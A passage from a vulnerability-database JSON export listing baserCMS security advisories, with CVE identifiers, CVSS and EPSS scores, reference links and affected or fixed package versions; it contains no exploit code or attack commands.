ty":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4"}],"aliases":["CVE-2018-18942","GHSA-rjc2-x53r-6c9r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gsg3-fdmu-vqag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38783?format=json","vulnerability_id":"VCID-guvm-x5jc-mfgc","summary":"Path Traversal\nbaserCMS allows remote attackers to delete arbitrary files via unspecified vectors when the \"File\" field is being used in the mail 
form.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10843","reference_id":"","reference_type":"","scores":[{"value":"0.0057","scoring_system":"epss","scoring_elements":"0.69014","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0057","scoring_system":"epss","scoring_elements":"0.68975","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10843"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10843","reference_id":"CVE-2017-10843","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10843"},{"reference_url":"https://github.com/advisories/GHSA-x73x-7gmx-w835","reference_id":"GHSA-x73x-7gmx-w835","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x73x-7gmx-w835"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulner
ability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproje
ct/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/base
rcms@4.0.6"}],"aliases":["CVE-2017-10843","GHSA-x73x-7gmx-w835"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-guvm-x5jc-mfgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41362?format=json","vulnerability_id":"VCID-hpk4-a6tr-3ffe","summary":"baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN14134801/index.html","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN14134801/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39136","reference_id":"","reference_type":"","scores":[{"value":"0.0054","scoring_system":"epss","scoring_elements":"0.67989","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0054","scoring_system":"epss","scoring_elements":"0.6795","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39136"},{"reference_url":"https://basercms.net/security/JVN_14134801","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_14134801"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/bas
erproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39136","reference_id":"CVE-2021-39136","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39136"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/58790?format=json","purl":"pkg:composer/baserproject/basercms@4.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerabili
ty":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1"}],"aliases":["CVE-2021-39136","GHSA-hgjr-632x-qpp3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44713?format=json","vulnerability_id":"VCID-j37y-gws9-ake9","summary":"Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. 
Version 4.7.5 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25654","reference_id":"","reference_type":"","scores":[{"value":"0.02083","scoring_system":"epss","scoring_elements":"0.84309","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02083","scoring_system":"epss","scoring_elements":"0.84332","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25654"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96"},{"reference_url":"https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359"},{"reference_url":"https://github.com/baserproject/basercms/commit/60f8305
4d8131b0ace60716cec7e629b5eb3a8f0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25654","reference_id":"CVE-2023-25654","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25654"},{"reference_url":"https://github.com/advisories/GHSA-h4cc-fxpp-pgw9","reference_id":"GHSA-h4cc-fxpp-pgw9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-h4cc-fxpp-pgw9"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9","reference_id":"GHSA-h4cc-fxpp-pgw9","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":
"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64369?format=json","purl":"pkg:composer/baserproject/basercms@4.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"}],"aliases":["CVE-2023-25654","GHSA-h4cc-fxpp-pgw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46310?format=json","vulnerability_id":"VCID-jby7-s5ez-dqb3","summary":"Cross-Site Request Forgery (CSRF) in 
baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43649","reference_id":"","reference_type":"","scores":[{"value":"0.00118","scoring_system":"epss","scoring_elements":"0.3025","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43649"},{"reference_url":"https://basercms.net/security/JVN_99052047","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://basercms.net/security/JVN_99052047"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43649"
,"reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43649"},{"reference_url":"https://github.com/advisories/GHSA-fw9x-cqjq-7jx5","reference_id":"GHSA-fw9x-cqjq-7jx5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-fw9x-cqjq-7jx5"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5","reference_id":"GHSA-fw9x-cqjq-7jx5","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"
}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43649","GHSA-fw9x-cqjq-7jx5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109461?format=json","vulnerability_id":"VCID-k575-suuf-7bhf","summary":"baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary 
script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-41994","reference_id":"","reference_type":"","scores":[{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34314","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34412","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-41994"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://jvn.jp/en/jp/JVN53682526/index.html","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"}],"url":"https://jvn.jp/en/jp/JVN53682526/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41994","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual"
